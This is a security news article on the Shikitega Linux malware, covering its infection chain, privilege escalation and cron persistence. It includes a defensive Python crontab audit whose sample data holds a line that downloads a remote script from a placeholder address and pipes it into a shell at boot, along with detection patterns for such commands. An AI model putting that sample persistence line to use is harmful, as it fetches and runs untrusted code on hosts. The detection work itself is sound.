Researchers from AT&T Alien Labs Research have discovered a new and stealthy Linux malware, dubbed Shikitega. Once it is on a machine or device, Shikitega executes a "multistage infection chain" involving very small files, a couple of known vulnerabilities, and Mettle, a portable implementation of the Metasploit Meterpreter payload. Shikitega can give threat actors complete control of an infected system, with a persistent cryptominer mining Monero in the background.
The chain
At its core, Shikitega is built for evasion, and that shows from the moment its infection chain begins.
AT&T reports that Shikitega is dropped onto Linux endpoints and devices by a malicious ELF file no bigger than 400 bytes. This tiny dropper carries an encoded shellcode. Once executed, it decodes its payload layer by layer with Shikata Ga Nai, the polymorphic XOR additive-feedback encoder from Metasploit (the name is Japanese for "it cannot be helped"), until the final shellcode is recovered. That shellcode then contacts a Cloudflare-hosted command-and-control (C2) server to receive additional commands. Because the dropper is so small and its payload is re-encoded differently each time, a byte signature for the payload is of little use; the decoder loop and the behaviour that follows it are what remain detectable.
One of these commands downloads and executes Mettle, which gives the attackers full remote control of the compromised host or device. Shikitega also fetches a second malicious ELF file, an exploit for CVE-2021-4034 (the PwnKit local privilege escalation in polkit's pkexec) and CVE-2021-3493 (an OverlayFS privilege-escalation bug in Ubuntu kernels). Exploiting either elevates the attacker to root, which is then used to download and run the XMRig Monero cryptominer as root.
To keep the miner running, Shikitega downloads and executes five scripts that install four crontab entries (scheduled tasks): two for the logged-in user and two for the root user. "As the malware persists with crontabs, it will delete all downloaded files from the system to hide its presence," the researchers said in the report. Because the dropped files are removed, the crontab entries and the running processes are the most durable on-host evidence an investigator will find.
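As an added example (not code from the AT&T report), here is a small Python audit that parses crontab text and flags entries with the traits a persistence entry like Shikitega's tends to have: running at boot, executing from a world-writable temporary directory, fetching remote content, piping it into a shell, or discarding all output. The sample crontab lines are constructed for the demonstration; the actual entries Shikitega installs are not published on this page, so the sample is not an indicator list.

```python
import re
import subprocess
from typing import Dict, List

# Constructed sample crontab for the demonstration; not lines from the AT&T report.
SAMPLE_CRONTAB = """\
PATH=/usr/bin:/bin
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /var/tmp/.x/miner >/dev/null 2>&1
@reboot curl -s http://203.0.113.10/s.sh | sh
30 3 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

_ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")          # NAME=value lines set cron's environment
_DOWNLOADER = re.compile(r"\b(curl|wget)\b")
_PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")            # "| sh", "|bash", "| dash" ...
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into (schedule, command) entries, skipping comments and variable lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or _ENV_LINE.match(line):
            continue
        if line.startswith("@"):                       # @reboot, @daily, ... take a single field
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)                # five time fields, then the command
            if len(parts) < 6:
                continue                               # malformed; cron would reject it too
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append({"schedule": schedule, "command": command.strip()})
    return entries


def assess_entry(entry: Dict[str, str]) -> List[str]:
    """Return the list of reasons an entry looks like a persistence mechanism (empty if benign)."""
    reasons = []
    cmd = entry["command"]
    if entry["schedule"] == "@reboot":
        reasons.append("runs at boot")
    if any(d in cmd for d in WRITABLE_DIRS):
        reasons.append("executes from a world-writable directory")
    if _DOWNLOADER.search(cmd):
        reasons.append("fetches remote content")
    if _PIPE_TO_SHELL.search(cmd):
        reasons.append("pipes output into a shell")
    if "/dev/null" in cmd:
        reasons.append("discards all output")
    return reasons


def suspicious_cron_entries(text: str) -> List[Dict[str, object]]:
    """Parse a crontab and keep only the entries that trip at least one heuristic."""
    findings = []
    for entry in parse_crontab(text):
        reasons = assess_entry(entry)
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings


def read_user_crontab(user: str) -> str:
    """Fetch a user's crontab with the real `crontab -l -u USER` (needs root for other users).
    Returns an empty string if the user has no crontab."""
    proc = subprocess.run(["crontab", "-l", "-u", user], capture_output=True, text=True)
    return proc.stdout if proc.returncode == 0 else ""


if __name__ == "__main__":
    for finding in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"{finding['schedule']:<12} {finding['command']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Run it over the logged-in user's crontab and, as root, over root's crontab (the report says Shikitega sets entries for both), and also over /etc/crontab and the files in /etc/cron.d, which the user-level `crontab -l` does not show. Capture the entries and the process list before any cleanup: once the malware has deleted its downloaded files, these may be the only evidence left.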
Protect your Linux system from Shikitega
Linux users can protect their systems from Shikitega with standard Linux hardening, prompt patching to close the vulnerabilities it exploits (CVE-2021-4034 in polkit's pkexec and CVE-2021-3493 in the kernel's OverlayFS), and effective anti-malware and EDR on servers and endpoints. Because the dropper is tiny and its payload is polymorphically encoded, detection should lean on behaviour rather than file signatures: unexpected crontab changes, processes launched from temporary directories, new outbound connections from a host that previously made none, and sustained CPU load from an unknown process. These should be paired with offsite and offline backups to provide an effective fallback.
Forget what you may have heard about Linux not having malware: every operating system is targeted by threat actors, and every one has malware. Only the tactics, techniques and procedures (TTPs) vary, according to how each operating system works and the roles it plays in our lives and on our business networks.